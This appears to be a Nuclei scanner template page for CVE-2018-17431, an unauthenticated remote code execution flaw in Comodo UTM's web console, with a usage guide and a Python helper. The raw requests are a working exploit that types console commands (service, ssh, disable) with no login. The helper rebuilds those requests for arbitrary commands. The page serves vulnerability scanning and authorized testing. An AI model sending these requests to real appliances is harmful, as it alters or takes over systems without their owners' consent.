Comodo Unified Threat Management Web Console - Remote Code Execution
ID: CVE-2018-17431
Severity: critical
Author: dwisiswant0
Tags: cve,cve2018,comodo,rce,edb
Description
Comodo Unified Threat Management (UTM) Firewall releases before 2.7.0 and Comodo Central Manager releases before 1.5.0 are susceptible to a web-shell-based remote code execution vulnerability: the web console's shell endpoint accepts keystrokes over HTTP without authentication (CVSS PR:N, CWE-287).
YAML Source
id: CVE-2018-17431

info:
  name: Comodo Unified Threat Management Web Console - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Apply the latest security patches or updates provided by Comodo to fix this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/48825
    - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17431
    - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
    - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-17431
    cwe-id: CWE-287
    epss-score: 0.11416
    epss-percentile: 0.95098
    cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: comodo
    product: unified_threat_management_firewall
  tags: cve,cve2018,comodo,rce,edb

http:
  - raw:
      - |
        GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1
        Host: {{Hostname}}
        Connection: close

      - |  # to trigger RCE
        GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Configuration has been altered"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210088dc39a87b48e5924aad1bc187befd9ba65e310d185cb16bd091f35474bf5846022100dd20830ee91e6258f2ded7a5b4b3b9499d7b9875e605cbac0fd324e3d857d769:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner. It sends the two raw GET requests above to /manage/webshell/u without any credentials and reports the target as vulnerable only when a response has HTTP status 200 and its body contains the string "Configuration has been altered" (both matchers must pass, since matchers-condition is and). Note that the keystrokes carried in the first request's k parameter percent-decode to three console lines, service, ssh and disable, followed by a bare newline in the second request: a positive match therefore means the scanner has actually submitted a command to the appliance's web console shell, not merely probed for its presence, so run the template only against systems you are authorized to test.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-17431.yaml"
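As an added illustration (not code from the template or from the Nuclei project), the Python below reproduces offline what the two raw requests carry and how the matcher block decides: it percent-decodes the k parameter to show the keystrokes the template types, rebuilds the request pair for an arbitrary list of console lines using the fixed query values copied from the template, and applies the word-plus-status matcher to a few sample responses. The sample responses are constructed for this example, and the assumption that k carries one percent-encoded byte per keystroke with %0a acting as Enter is taken from the template's own encoding, not from vendor documentation.

```python
"""Added example, not code from the nuclei template or the Nuclei project.

Offline helpers that decode what the CVE-2018-17431 template sends and
re-implement its matcher logic. Assumption (taken from the template's own
encoding, not from vendor documentation): the web console's `k` parameter
carries keystrokes as one percent-encoded byte each, with %0a as Enter.
"""
from urllib.parse import parse_qs, urlsplit

# The two request paths, copied verbatim from the template's raw requests.
TEMPLATE_PATHS = [
    "/manage/webshell/u?s=5&w=218&h=15"
    "&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a"
    "&l=62&_=5621298674064",
    "/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064",
]

# Query values other than `k`, copied from the template. Their meaning is
# not documented on the page, so they are reused here as opaque constants.
_ENDPOINT = "/manage/webshell/u?s=5&w=218&h=15&k={k}&l=62&_=5621298674064"

# Strings from the template's matcher block.
MATCH_WORD = "Configuration has been altered"
MATCH_STATUS = 200


def decode_keystrokes(path: str) -> str:
    """Return the plain-text keystrokes in the `k` parameter of a request path."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return query["k"][0]


def encode_keystrokes(text: str) -> str:
    """Percent-encode every byte as lowercase %xx, exactly as the template does."""
    return "".join(f"%{b:02x}" for b in text.encode("ascii"))


def build_request_paths(cli_lines):
    """Rebuild the template's request pair for a list of console lines:
    the first request types the lines (each followed by Enter), the second
    sends a bare Enter, which is the request the template labels as the trigger."""
    typed = "".join(line + "\n" for line in cli_lines)
    return [
        _ENDPOINT.format(k=encode_keystrokes(typed)),
        _ENDPOINT.format(k=encode_keystrokes("\n")),
    ]


def template_matches(status: int, body: str) -> bool:
    """Apply the template's matchers: `matchers-condition: and` over a
    `word` matcher on the body and a `status` matcher requiring 200."""
    return MATCH_WORD in body and status == MATCH_STATUS


def scan_responses(responses):
    """Return the indices of (status, body) pairs the template would report."""
    return [i for i, (status, body) in enumerate(responses)
            if template_matches(status, body)]


# Constructed sample responses (not captured from a real appliance).
CONSTRUCTED_RESPONSES = [
    (200, "<html><body>Configuration has been altered. Restart?</body></html>"),
    (200, "<html><body>Please log in</body></html>"),
    (302, "Configuration has been altered"),
]

if __name__ == "__main__":
    for path in TEMPLATE_PATHS:
        print(repr(decode_keystrokes(path)))
    print(build_request_paths(["service", "ssh", "disable"]) == TEMPLATE_PATHS)
    print(scan_responses(CONSTRUCTED_RESPONSES))
```

Running the script prints the decoded keystrokes of both requests, confirms that re-encoding the three console lines reproduces the template's first request byte for byte, and shows that only the first constructed response (marker string present and status 200) would be reported; the third response carries the marker but fails the status matcher.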